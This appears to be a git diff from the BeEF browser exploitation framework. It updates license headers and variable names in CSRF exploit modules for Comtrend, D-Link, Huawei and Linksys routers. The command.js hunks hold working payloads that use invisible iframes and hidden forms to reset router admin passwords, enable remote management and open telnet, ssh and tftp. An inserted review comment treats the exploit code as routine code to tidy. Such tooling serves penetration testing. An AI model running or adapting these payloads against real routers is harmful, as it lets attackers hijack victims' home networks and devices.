(BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/cisco_e2400_csrf/module.rb b/modules/exploits/router/cisco_e2400_csrf/module.rb index 0af343362..51e286038 100644 --- a/modules/exploits/router/cisco_e2400_csrf/module.rb +++ b/modules/exploits/router/cisco_e2400_csrf/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Cisco_e2400_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js index d713b6b06..b9917bf6a 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js 
@@ -1,26 +1,18 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe(); + ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); - var ct5367_iframe2 = beef.dom.createInvisibleIframe(); + var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('action', gateway + "password.cgi"); 
@@ -46,16 +38,16 @@ beef.execute(function() { input.setAttribute('value', passwd); form.appendChild(input); - ct5367_iframe2.contentWindow.document.body.appendChild(form); + ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form); form.submit(); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(ct5367_iframe1); - document.body.removeChild(ct5367_iframe2); + document.body.removeChild(ct5367_iframe1_<%= @command_id %>); + document.body.removeChild(ct5367_iframe2_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml index c579a47b9..641dbdfa7 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml +++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/comtrend_ct5367_csrf/module.rb b/modules/exploits/router/comtrend_ct5367_csrf/module.rb index 13ae2bb76..44278f378 100644 
--- a/modules/exploits/router/comtrend_ct5367_csrf/module.rb +++ b/modules/exploits/router/comtrend_ct5367_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Comtrend_ct5367_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js index afe248983..08ecf84ae 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js 
@@ -1,35 +1,27 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe(); + ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); - var ct5367_iframe2 = beef.dom.createInvisibleIframe(); - ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); + var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe(); + ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - 
document.body.removeChild(ct5367_iframe1); - document.body.removeChild(ct5367_iframe2); + document.body.removeChild(ct5367_iframe1_<%= @command_id %>); + document.body.removeChild(ct5367_iframe2_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml index 27f47c06e..4b1df0668 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml +++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/comtrend_ct5624_csrf/module.rb b/modules/exploits/router/comtrend_ct5624_csrf/module.rb index 84948985e..6d4b690ae 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/module.rb +++ b/modules/exploits/router/comtrend_ct5624_csrf/module.rb 
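Review bot: The iframe handles in this hunk are still named `ct5367_iframe1_<%= @command_id %>` and `ct5367_iframe2_<%= @command_id %>` although the file is the CT5624 module, which reads like a carry-over from comtrend_ct5367_csrf; the per-command rename was the moment to correct it. `var ct5624_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();` with the matching `ct5624_iframe2_<%= @command_id %>` declaration and the two `removeChild` calls would make the file self-describing and keep the two modules distinguishable when reading stack traces or the DOM. The hunk also keeps the implicit-global `cleanup = function()` plus string-form `setTimeout("cleanup()", …)` that the other router modules in this commit use; a local `var cleanup` passed by reference to `setTimeout` is the safer form.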
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Comtrend_ct5624_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/dlink_dir_615_csrf/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js index e7cad9472..8c7fd4599 100644 --- a/modules/exploits/router/dlink_dir_615_csrf/command.js +++ b/modules/exploits/router/dlink_dir_615_csrf/command.js 
@@ -1,23 +1,15 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; + var timeout = 15; - var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", + var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} , {'type':'hidden', 'name':'apply', 'value':'Save Settings'}, {'type':'hidden', 'name':'admin_name', 'value':'admin'}, @@ -32,9 +24,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(dir615_iframe); + document.body.removeChild(dir615_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/dlink_dir_615_csrf/config.yaml b/modules/exploits/router/dlink_dir_615_csrf/config.yaml index 7c1ea2e30..eec7a5fd5 100644 --- a/modules/exploits/router/dlink_dir_615_csrf/config.yaml +++ b/modules/exploits/router/dlink_dir_615_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/dlink_dir_615_csrf/module.rb b/modules/exploits/router/dlink_dir_615_csrf/module.rb index f9a62e534..0d400c84a 100644 --- a/modules/exploits/router/dlink_dir_615_csrf/module.rb +++ b/modules/exploits/router/dlink_dir_615_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Dlink_dir_615_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js index f25c89a5b..c48624322 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/command.js +++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js @@ -1,23 +1,15 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", + var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, 
@@ -28,9 +20,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(dsl500t_iframe); + document.body.removeChild(dsl500t_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml index d7e6ace24..ad849fb86 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml +++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/dlink_dsl500t_csrf/module.rb b/modules/exploits/router/dlink_dsl500t_csrf/module.rb index 804200959..78b358462 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/module.rb +++ b/modules/exploits/router/dlink_dsl500t_csrf/module.rb 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Dlink_dsl500t_csrf < BeEF::Core::Command
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js
index bfe98e957..09667bd04 100644
--- a/modules/exploits/router/huawei_smartax_mt880/command.js
+++ b/modules/exploits/router/huawei_smartax_mt880/command.js
@@ -1,32 +1,24 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-//
-beef.execute(function() {
- var gateway = '<%= @base %>';
- var username = '<%= @username %>';
- var passwd = '<%= @password %>';
- var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
- huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+beef.execute(function() {
+ var gateway = '<%= @base %>';
+ var username = '<%= @username %>';
+ var passwd = '<%= @password %>';
+ var timeout = 15;
+
+ var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+ huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 cleanup = function() {
- document.body.removeChild(huawei_smartax_mt880_iframe);
+ document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
 }
- setTimeout("cleanup()", 15000);
+ setTimeout("cleanup()", timeout*1000);
 });
diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml index d12a65130..7febce906 100644 --- a/modules/exploits/router/huawei_smartax_mt880/config.yaml +++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/huawei_smartax_mt880/module.rb b/modules/exploits/router/huawei_smartax_mt880/module.rb index 77f39ba20..ce8c3ff77 100644 --- a/modules/exploits/router/huawei_smartax_mt880/module.rb +++ b/modules/exploits/router/huawei_smartax_mt880/module.rb 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Huawei_smartax_mt880_csrf < BeEF::Core::Command
diff --git a/modules/exploits/router/linksys_befsr41_csrf/command.js b/modules/exploits/router/linksys_befsr41_csrf/command.js
index cb7d19eb5..60cee7e6c 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/command.js
+++ b/modules/exploits/router/linksys_befsr41_csrf/command.js
@@ -1,28 +1,21 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - var befsr41_iframe = beef.dom.createInvisibleIframe(); - befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0'); +beef.execute(function() { + var timeout = 15; + + var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); + befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0'); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(befsr41_iframe); + document.body.removeChild(befsr41_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml index d3308de95..d6678fa30 100644 
--- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml +++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/linksys_befsr41_csrf/module.rb b/modules/exploits/router/linksys_befsr41_csrf/module.rb index 40dcaa4dc..96044225b 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/module.rb +++ b/modules/exploits/router/linksys_befsr41_csrf/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Linksys_befsr41_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/command.js b/modules/exploits/router/linksys_wrt54g2_csrf/command.js index 0f362bf89..5b1097a45 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g2_csrf/command.js 
@@ -1,24 +1,16 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - var port = '<%= @port %>'; - var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; - var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", +beef.execute(function() { + var port = '<%= @port %>'; + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + var timeout = 15; + + var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} , {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'}, {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'}, @@ -36,9 +28,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(wrt54g2_iframe); + document.body.removeChild(wrt54g2_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml index a64dd89fd..ca2aa920b 100644 
--- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb index 94f5d6ed0..15e6082f7 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb +++ b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Linksys_wrt54g2_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/linksys_wrt54g_csrf/command.js b/modules/exploits/router/linksys_wrt54g_csrf/command.js index d18e65898..668315b6e 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g_csrf/command.js 
